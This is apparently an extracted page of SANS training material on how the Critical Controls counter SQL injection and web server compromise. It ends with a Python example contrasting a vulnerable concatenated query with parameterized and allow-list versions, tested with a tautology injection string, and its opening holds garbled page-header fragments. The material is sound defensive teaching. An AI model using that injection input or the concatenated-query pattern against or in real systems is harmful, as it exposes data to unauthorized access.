15 SANS: of 3 5/6/ :22 Critical Controls as Applied to As discussed previously, web application vulnerabilities and server-side HTTP threats pose a serious threat not only to the web servers you control, but also the servers that your users visit in day-to-day activities. Trends have indicated that SQL injection attacks are rising rapidly. SQL injection attacks are only valid if an application is written in such a way as to allow them; vulnerability is not a matter of configuration or (usually) access control. The Key Elements of these attacks and associated Controls: Web applications have vulnerabilities that can be easily discovered and exploited remotely include the following: Control 7 (Application Software Security) is perhaps the most critical control regarding these types of attacks. Application developers should ensure that all input received from remote sources is sanitized of data meaningful to backend database systems. Control 5 (Boundary Defenses) can ensure that the appropriate layered protections are in place to prevent/detect attacks aimed at your web servers. Controls 2 (Inventory of Software), 3 (Secure Configurations), and 10 (Vulnerability Assessment and Remediation) can ensure that vulnerable applications are accounted for, identified for defensive planning, and remediated in a timely manner. Successful exploitation grants the attacker the ability to put malicious code on the server and attempt to compromise all clients that browse that server. Control 6 (Audit Logs) can assist in identifying when someone has compromised your web server. Control 18 (Incident Response Capability) can help mitigate the impact of, and assist in recovery from, attacks against vulnerable applications. [End] Ben's insight into legal issues and teaching style makes this potentially dry material exciting. His stories and examples add to the printed material -Karl Kurrle, Golf Savings Bank
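As an added illustration of the Control 7 point above (example code written for this page, not taken from the SANS report): the same user lookup written with remote input spliced into the SQL text, beside the parameterized form in which a bound value can never become SQL, plus an allow-list check as the sanitization step the text calls for. The table, rows, usernames and the `is_valid_username` pattern are all constructed assumptions.

```python
import re
import sqlite3

# Allow-list for the one input this lookup accepts. Constructed for the
# example; a real application derives the pattern from its own data rules.
USERNAME_RE = re.compile(r"^[a-z0-9_]{1,32}$")


def make_db():
    """Build a constructed in-memory sample database (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "admin"), ("bob", "user")],
    )
    return conn


def lookup_role_vulnerable(conn, username):
    """Control 7 failure: remote input is concatenated into the SQL text.

    Quote characters and keywords in the input are interpreted by the
    database, so the input can change which rows the query returns.
    """
    sql = ("SELECT username, role FROM users WHERE username = '"
           + username + "'")
    return conn.execute(sql).fetchall()


def lookup_role_parameterized(conn, username):
    """Hardened form: the value is bound as a parameter.

    The SQL text is fixed; whatever the input contains, it is compared
    as a string against the username column and nothing else.
    """
    sql = "SELECT username, role FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def is_valid_username(username):
    """Allow-list check: reject anything outside the expected character set.

    This is the sanitization step the text describes. It is defense in
    depth on top of parameter binding, not a replacement for it.
    """
    return USERNAME_RE.fullmatch(username) is not None


def lookup_role_hardened(conn, username):
    """Validate first, then query with a bound parameter."""
    if not is_valid_username(username):
        return []
    return lookup_role_parameterized(conn, username)


if __name__ == "__main__":
    db = make_db()
    # Constructed tautology input of the kind SQL injection relies on.
    probe = "x' OR 'a'='a"
    print("vulnerable:", lookup_role_vulnerable(db, probe))    # every row
    print("bound:     ", lookup_role_parameterized(db, probe))  # no rows
    print("hardened:  ", lookup_role_hardened(db, probe))       # no rows
```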